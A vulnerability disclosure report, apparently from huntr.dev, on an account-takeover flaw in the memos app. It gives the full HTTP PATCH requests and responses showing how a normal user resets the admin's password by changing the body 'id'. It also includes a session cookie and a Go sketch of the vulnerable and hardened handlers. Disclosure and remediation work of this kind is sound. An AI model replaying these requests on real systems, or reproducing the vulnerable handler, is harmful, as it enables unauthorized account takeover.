Account takeover via changing password

Published: 2022-12-19 18:31:03
Reporter: mohamedabdelhady933
Source: www.huntr.dev
Tags: account takeover, password change, user settings, api request, response, security vulnerability

EPSS: 0.001 (percentile 37.0%)

Description

After logging in as a normal user, go to Settings and change the password; you will see the following request:

PATCH /api/user/104 HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MTQ3MjA1M3xEdi1EQkFFQ180UUFBUkFCRUFBQUhfLUVBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUE9fF-6AEnsMyuj8shTHmH9_q-nZgcVnIaW9EHKAC4Ncnrl
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 30
Referer: https://demo.usememos.com/
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"id":104,"password":"xthemo"}

The response to the password change is:

HTTP/2 200 OK
Date: Mon, 19 Dec 2022 17:48:17 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 269
Cf-Ray: 77c1f7d9bae011c1-MRS
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
Server: cloudflare
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

{"data":{"id":104,"rowStatus":"NORMAL","createdTs":1671469980,"updatedTs":1671472096,"username":"test","role":"USER","email":"","nickname":"test","openId":"40edea21-d038-44ec-be61-c9699e925bb6","userSettingList":[{"UserID":104,"key":"appearance","value":"\"dark\""}]}}

If you change the "id" in the request body to 101 (the admin account), it will change that account's password, as in the following request (note that the URL path is still /api/user/104; only the "id" field in the JSON body changes):

PATCH /api/user/104 HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MTQ3MjA1M3xEdi1EQkFFQ180UUFBUkFCRUFBQUhfLUVBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUE9fF-6AEnsMyuj8shTHmH9_q-nZgcVnIaW9EHKAC4Ncnrl
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 30
Referer: https://demo.usememos.com/
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"id":101,"password":"xthemo"}

The password of user 101 is changed as well, as shown in the following response:

HTTP/2 200 OK
Date: Mon, 19 Dec 2022 17:48:31 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 271
Cf-Ray: 77c1f8340edb11c1-MRS
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
Server: cloudflare
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

{"data":{"id":101,"rowStatus":"NORMAL","createdTs":1671455650,"updatedTs":1671472111,"username":"demohero","role":"HOST","email":"[email protected]","nickname":"Demo Hero","openId":"demo_open_id","userSettingList":[{"UserID":104,"key":"appearance","value":"\"dark\""}]}}

POC video

https://drive.google.com/file/d/1y2Czg9j4Qgc9mg5Ad3W8DY18ZoRyZkzd/view?usp=sharing
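The root cause visible in the requests above is that the server updates whichever account the JSON body names, not the account bound to the session cookie. The Go sketch below is an added illustration, not code from the memos project: it contrasts that behaviour with a handler that takes the target from the URL path, rejects a body id that disagrees with it, and lets only the account owner or a HOST change the password. The in-memory store, status codes and function names are assumptions for illustration.

```go
package main

import "encoding/json"

type user struct{ Role, Password string } // Role is "HOST" (admin) or "USER"
type patchBody struct {
	ID       int    `json:"id"`
	Password string `json:"password"`
}

// newStore returns constructed example accounts standing in for the memos database.
func newStore() map[int]*user {
	return map[int]*user{101: {"HOST", "admin-old"}, 104: {"USER", "user-old"}}
}

// vulnerablePatch mirrors the reported behaviour: the caller is authenticated (sessionUserID
// comes from the session cookie) but the account to update is whatever "id" the body says.
func vulnerablePatch(store map[int]*user, sessionUserID int, body []byte) int {
	var req patchBody
	if err := json.Unmarshal(body, &req); err != nil {
		return 400
	}
	if target, ok := store[req.ID]; ok {
		target.Password = req.Password
		return 200
	}
	return 404
}

// hardenedPatch takes the target from the URL path (/api/user/{pathID}), rejects a body id
// that disagrees with it, and lets only the account owner or a HOST change the password.
func hardenedPatch(store map[int]*user, sessionUserID, pathID int, body []byte) int {
	var req patchBody
	if err := json.Unmarshal(body, &req); err != nil {
		return 400
	}
	if req.ID != 0 && req.ID != pathID {
		return 400 // body/path mismatch is an error, not a hint about whom to update
	}
	caller, ok := store[sessionUserID]
	if !ok || (pathID != sessionUserID && caller.Role != "HOST") {
		return 403 // the object-level authorization check the original lacks
	}
	if target, ok := store[pathID]; ok {
		target.Password = req.Password
		return 200
	}
	return 404
}
```

With the reported body `{"id":101,"password":"xthemo"}` sent by user 104, the vulnerable handler returns 200 and overwrites user 101, while the hardened handler returns 400 (path 104) or 403 (path 101) and leaves it untouched.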
